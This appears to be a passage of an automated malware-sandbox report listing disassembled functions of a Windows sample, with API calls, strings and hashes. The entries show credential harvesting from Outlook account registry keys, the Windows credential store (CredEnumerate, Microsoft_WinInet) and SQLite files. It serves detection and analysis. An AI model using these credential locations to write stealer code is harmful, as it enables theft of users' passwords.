                                                                                                                  • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                  • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                                                                                  • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                  Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy
                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                  • API String ID: 714388716-318151290
                                                                                                                  • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                  • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                  • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                  • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                  Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                  • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                  • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                    • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                    • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                    • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                  • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                  • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                  • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1416211542-0
                                                                                                                  • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                  • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                  • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                  • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                  Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                  • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                  • API String ID: 2360744853-2229823034
                                                                                                                  • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                  • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                  • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                  • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                  Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  • memset.MSVCRT ref: 00402C9D
                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                  • memset.MSVCRT ref: 00402CF7
                                                                                                                  • sprintf.MSVCRT ref: 00402D10
                                                                                                                  • sprintf.MSVCRT ref: 00402D4E
                                                                                                                    • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                    • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Closememset$sprintf$EnumOpen
                                                                                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                  • API String ID: 1831126014-3814494228
                                                                                                                  • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                  • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                  • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                  • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                  Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strchr.MSVCRT ref: 004100E4
                                                                                                                  • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                  • _mbscat.MSVCRT ref: 0041014D
                                                                                                                  • memset.MSVCRT ref: 00410129
                                                                                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                  • memset.MSVCRT ref: 00410171
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                  • _mbscat.MSVCRT ref: 00410197
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                  • String ID: \systemroot
                                                                                                                  • API String ID: 912701516-1821301763
                                                                                                                  • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                  • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                  Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                  Strings
                                                                                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                  • API String ID: 1640410171-2022683286
                                                                                                                  • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                  • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                  • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                  • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                  Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                  • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                  • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$strlen
                                                                                                                  • String ID: -journal$-wal$immutable$nolock
                                                                                                                  • API String ID: 2619041689-3408036318
                                                                                                                  • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                  • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                  • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                  • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                  Function 00409C1C Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 157COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A3E
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A4C
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A5D
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A74
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A7D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,76270A60,?,00000000), ref: 00409C53
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,76270A60,?,00000000), ref: 00409C6F
                                                                                                                  • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,76270A60), ref: 00409C97
                                                                                                                  • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,76270A60), ref: 00409CB4
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76270A60), ref: 00409D3D
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,76270A60), ref: 00409D47
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76270A60), ref: 00409D7F
                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76270A60), ref: 00408EBE
                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408E31
                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                  • String ID: 0wE$`'v$`'v
                                                                                                                  • API String ID: 2915808112-3269934094
                                                                                                                  • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                  • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                  • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                  • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                  Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 667451143-3916222277
                                                                                                                  • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                  • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                  • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                  • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                  Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                  • wcslen.MSVCRT ref: 0040874A
                                                                                                                  • wcsncmp.MSVCRT ref: 00408794
                                                                                                                  • memset.MSVCRT ref: 0040882A
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                  • wcschr.MSVCRT ref: 0040889F
                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                  • String ID: J$Microsoft_WinInet
                                                                                                                  • API String ID: 3318079752-260894208
                                                                                                                  • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                  • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                  • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                  • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                  Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(comctl32.dll,76270A60,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404AB8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76270A60), ref: 00404ADE
                                                                                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                  Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                                                                                  • strlen.MSVCRT ref: 00406CCC
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                                                                                  • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                                                                                  • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                  • API String ID: 2881943006-572158859
                                                                                                                  • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                  • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                  • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                  • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                  Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                  • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                  • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                  • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                    • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                  • API String ID: 888011440-2039793938
                                                                                                                  • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                  • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                  • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                  • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                  Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                  • database is already attached, xrefs: 0042EA97
                                                                                                                  • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                  • database %s is already in use, xrefs: 0042E9CE
                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                  • out of memory, xrefs: 0042EBEF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                  • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
